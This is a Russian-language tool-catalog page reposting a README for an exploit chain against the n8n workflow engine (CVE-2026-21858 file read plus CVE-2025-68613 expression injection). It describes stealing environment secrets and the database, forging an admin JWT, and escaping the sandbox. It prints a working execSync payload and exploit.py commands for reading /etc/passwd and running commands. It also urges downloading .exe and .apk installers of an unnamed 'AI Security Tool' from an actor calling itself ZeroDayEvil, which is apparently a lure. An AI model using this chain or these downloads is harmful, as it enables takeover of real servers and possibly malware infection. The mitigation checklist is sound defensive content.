Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-21858-n8n-FullChain — 🛡️ Официальный модуль AI Security Tool для CVE-2026-21858 + CVE-2025-68613 (n8n "Ni8mare" — полная цепочка: неаутентифицированное произвольное чтение файлов и RCE через инъекцию выражений). | Kitploit
Инструменты/GitHubGitHub/zerodayevil/cve-2026-21858-n8n-fullchain
Сканеры уязвимостейАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияВеб-безопасностьТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
Безопасность ИИ
GitHubzerodayevil/cve-2026-21858-n8n-fullchain

CVE-2026-21858-n8n-FullChain

🛡️ Официальный модуль AI Security Tool для CVE-2026-21858 + CVE-2025-68613 (n8n "Ni8mare" — полная цепочка: неаутентифицированное произвольное чтение файлов и RCE через инъекцию выражений).

Репозиторий
14 ч 10 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🛡️ Модуль AI Security Tool
n8n Full Chain (CVE-2026-21858 + CVE-2025-68613) — "Ni8mare"

Официальный модуль аудита безопасности для экосистемы AI Security Tool


Latest Release Build Status Donations Telegram Channel

License

🌐 Веб-демо • 📚 Сайт проекта • 💬 Чат сообщества

Навигация по сайту: Главная • Обновления • Загрузки • Модули

AI Security Tool Banner


🧠 Концептуальный обзор

Этот модуль предоставляет диагностические инструменты и полную цепочку эксплуатации для экземпляров автоматизации рабочих процессов n8n, получившую название Ni8mare.

Цепочка атаки объединяет неаутентифицированное произвольное чтение файлов (CVE-2026-21858), вызванное путаницей с Content-Type, с аутентифицированным обходом песочницы через инъекцию выражений (CVE-2025-68613). Отправляя манипулированный запрос Content-Type: application/json на открытую форму загрузки файлов, атакующий контролирует аргумент filepath для чтения внутренних системных файлов (/proc/self/environ, конфигурации и SQLite БД). Полученные encryptionKey и хеш пароля позволяют офлайн подделать JWT-cookie администратора. После аутентификации инъекция выражений через this.process.mainModule.require позволяет выйти из песочницы JavaScript для выполнения произвольных системных команд.

🎯 Основная философия воздействия

"От чтения файлов до полного захвата системы за три шага."
Хотя чтение файлов требует активного рабочего процесса формы с бинарным выводом, инъекция выражений надёжно работает на стандартных установках n8n без необходимости специальных узлов или явно включённых системных разрешений.

📊 Характеристики уязвимости

ХарактеристикаПрисвоенное значениеПримечания
Идентификаторы CVECVE-2026-21858 + CVE-2025-68613Полная цепочка: неаутентифицированное чтение файлов до RCE
Уровень критичностиКритический (CVSS v3.1: 10.0 + 9.9)Неаутентифицированная цепочка RCE
Типы уязвимостейCWE-200 / CWE-94Путаница Content-Type / Инъекция кода
Уязвимый компонентn8n Workflow Automation EngineВерсии <= 1.65.0 (AFR) / >= 0.211.0 (RCE)
Исправленные версии1.121.0 (AFR) / 1.120.4+ (RCE)Официальные патчи производителя выпущены
Требуемые привилегииОтсутствуютНеаутентифицированный первоначальный доступ через публичную форму

🕸 Сценарий атаки и архитектура

root@kitploit:~
graph TD
    A[Unauthenticated Attacker] -->|1. Content-Type Confusion| B[Vulnerable Form Endpoint]
    B -->|2. Arbitrary File Read| C[Extract /proc/self/environ & database.sqlite]
    C -->|3. Derive Secret & Hash| D[Forge Admin JWT Cookie]
    D -->|4. Authenticate as Admin| E[n8n Workflow Engine]
    E -->|5. Expression Injection Payload| F[Sandbox Escape via mainModule.require]
    F -->|6. Execute Command| G[Full Remote Code Execution]

💻 Полезная нагрузка инъекции выражений

root@kitploit:~
={{ (function() {
  var require = this.process.mainModule.require;
  var execSync = require("child_process").execSync;
  return execSync("id").toString();
})() }}

🛡 Чек-лист мер защиты

  • 🟢 Немедленное обновление: Обновите экземпляры n8n до версии 1.121.0 или выше.
  • 🟢 Ограничьте триггеры рабочих процессов: Отключите публичные неаутентифицированные рабочие процессы форм или обеспечьте строгую проверку файлов.
  • 🟡 Настройте ограничения выполнения: Установите N8N_ENFORCE_SETTINGS_FILE_PERMISSIONS=true и ограничьте возможности процессов в контейнерах Docker.

💻 Как запустить этот модуль

⚠️ ВАЖНО: Этот модуль создан специально для безопасного выполнения и диагностики в экосистеме AI Security Tool. Всегда используйте проверенные модули из официальных репозиториев.

1️⃣ Установите AI Security Tool

Для выполнения скриптов мониторинга и диагностики убедитесь, что установлено ядро AI Security Tool:

ОС / ПлатформаВерсияАрхитектура / ФорматДата выпускаСтатусСсылка для загрузки
🪟 Windowsv6.3.20x64 Installer (.exe)2026-09-08🟢 ПоследняяСкачать .exe
🪟 Windowsv6.3.20x64 Portable (.tar.gz)2026-09-08🟢 ПоследняяСкачать .tar.gz
🍏 macOSv5.3.29Apple Silicon M1/M2/M3 (.dmg)2026-09-05🟢 СтабильнаяСкачать .dmg
🐧 Linuxv5.3.27Universal x64 (.tar.gz)2026-09-01🟢 СтабильнаяСкачать .tar.gz
🤖 Androidv8a 5.3.27ARM64 APK (.apk)2026-09-01🟢 СтабильнаяСкачать .apk

2️⃣ Выполнение в консоли

root@kitploit:~
# Read arbitrary file via diagnostic module
uv run python exploit.py http://localhost:5678 /form/vulnerable-form --read /etc/passwd

Execute full attack chain with custom command

uv run python exploit.py http://localhost:5678 /form/vulnerable-form --cmd "id"


🔍 Модули аудита безопасности и репозитории PoC

Модули сканеров уязвимостей, PoC-скрипты и исследовательские репозитории, поддерживаемые нашим сообществом:

🔥 Удалённое выполнение кода (RCE) и сетевые уязвимости 5 модулей
  • CVE-2026-21858 — n8n Full Chain Unauthenticated RCE (Ni8mare) @ZeroDayEvil
  • CVE-2026-41089 — Netlogon Remote Code Execution Exploit @ZeroDayEvil
  • CVE-2026-20805 — Windows Remote Code Execution Proof-of-Concept @ZeroDayEvil
  • CVE-2026-41096 — Critical RCE Vulnerability Scanner Module @ZeroDayEvil
  • CVE-2026-24291 — Network Protocol Remote Code Execution @ZeroDayVPN
🛡️ Повышение привилегий (EoP) и службы 3 модуля
  • CVE-2026-54121 — AD CS Certighost Domain Controller Impersonation @ZeroDayEvil
  • CVE-2026-66804 — CrossDevice Service Elevation of Privilege @ZeroDayVPN
  • CVE-2026-50416 — Local Privilege Escalation Writeup & PoC @ZeroDayEvil
📚 Исследование уязвимостей и разборы 2 модуля
  • CVE-2026-42978 — Deep Technical Analysis & PoC Research @ZeroDayEvil
  • CVE-2026-83991 — Full WriteUp & Exploitation Demonstration @ZeroDayVPN

⚖️ Лицензия и правовая оговорка

🚨 Отказ от ответственности

Этот инструмент и технический анализ предоставляются строго для авторизованного аудита систем, исследований и тестирования на проникновение.
Выполнение цепочек эксплуатации против неавторизованных целей незаконно. Авторы не несут ответственности за несанкционированный доступ, потерю данных или нарушения работы систем. Работайте строго в рамках авторизованной области.

🔄 Вклад и сообщество

Мы приветствуем вклад сообщества исследователей безопасности! Основные направления для вклада:

  1. Интеграции с ИИ: Добавление новых провайдеров LLM и разработка специализированных агентов безопасности.
  2. Инструменты безопасности: Разработка модулей уязвимостей и интеграция CLI-сканеров.
  3. Оптимизация: Повышение скорости парсера, безопасности выполнения и логики кэширования.
  4. Документация: Написание исследовательских работ, руководств и локализованных переводов.

🔗 Контакты и поддержка

  • Официальный сайт: ZeroDayEvil.com
  • Оригинальное исследование: Cyera Ni8mare Write-up
  • Администратор Telegram: @ZeroDayEvil
  • Чат Telegram: @ZeroDyaTool_chat
  • Канал Telegram: @ZeroDyaTool_channel
  • Поддержать проект: Пожертвования PayPal
  • Open Collective: opencollective.com/ZeroDayEvil

AI Security Tool — переосмысление терминальных рабочих процессов и автоматизации для специалистов по кибербезопасности.

Скачать инструмент